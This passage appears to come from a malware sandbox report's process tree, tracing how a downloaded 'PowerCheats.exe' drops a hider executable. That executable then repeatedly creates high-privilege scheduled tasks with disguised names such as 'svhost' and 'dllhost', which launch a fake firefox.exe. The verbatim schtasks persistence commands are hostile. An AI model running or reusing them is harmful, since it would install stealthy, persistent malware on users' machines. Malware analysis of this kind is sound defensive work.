    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.9.1697217496\530272217" -childID 8 -isForBrowser -prefsHandle 6316 -prefMapHandle 6032 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42b9701e-7c0e-4d92-88d3-f863588d49ad} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 6328 1cf72b6ab58 tab
    3⤵
    PID:3428
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.10.1843568857\55871434" -childID 9 -isForBrowser -prefsHandle 6292 -prefMapHandle 6296 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec759ff7-94a7-48d9-8ab8-c1f3ec56ccf4} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 6284 1cf75fe1b58 tab
    3⤵
    PID:3252
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.11.817626368\1742098708" -childID 10 -isForBrowser -prefsHandle 5532 -prefMapHandle 5940 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fab57c44-e0d6-4b0e-ac32-320aefe8e7ba} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 6252 1cf72b67858 tab
    3⤵
    PID:5392
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.12.1307065215\1150680337" -childID 11 -isForBrowser -prefsHandle 5316 -prefMapHandle 5616 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4cb125d-665a-486b-a7bd-c4873deabe65} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 10476 1cf72b6a558 tab
    3⤵
    PID:5400
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.13.565609098\1172162159" -childID 12 -isForBrowser -prefsHandle 10472 -prefMapHandle 4344 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06e8c702-abd3-4ded-85eb-825b286541bb} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5452 1cf75ef0d58 tab
    3⤵
    PID:5408
- - C:\Users\Admin\Downloads\PowerCheats.exe
    "C:\Users\Admin\Downloads\PowerCheats.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5264
  - - C:\Users\Admin\Downloads\PowerCheat\PowerCheatEmuHider.exe
      "C:\Users\Admin\Downloads\PowerCheat\PowerCheatEmuHider.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:3508
    - - C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4456
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "conhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" & exit
        6⤵
        
        PID:6104
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "conhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:4660
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5252
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5340
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "dllhost" /tr "C:\Windows\conshost.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1452
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "dllhost" /tr "C:\Windows\conshost.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4604
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5032
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3892
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5128
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1384
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5940
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:4604
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4520
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:2320
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5852
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:1416
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4528
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5832
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5952
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5968
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:2784
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:1304
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5908
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5312
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5832
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5476
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:2208
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1980
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3748
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5868
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5988
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4000
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5208
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5276
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:6084
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3996
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3592
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:944
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3516
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4248
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1332
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:816
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5832
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5952
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4380
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5968
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3044
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:4256
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1304
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5980
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1332
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1268
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4244
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4136
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3448
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5468
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3728
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5128
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4580
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:1072
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5352
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:6084
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1040
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:6080
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5276
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4256
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5844
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5932
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:2052
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:2480
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4520
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:380
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4840
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:1476
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3648
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1976
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4208
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5196
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:2844
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1480
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:32
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5164
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:2552
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:380
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1084
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5368
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1944
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1184
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1648
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:6088
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5636
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4648
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5968
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1460
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2520
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4404
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1120
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5380
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4416
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3188
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5840
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1716
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3516
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3232
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4308
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4732
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1984
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:2300
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4280
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:6068
        
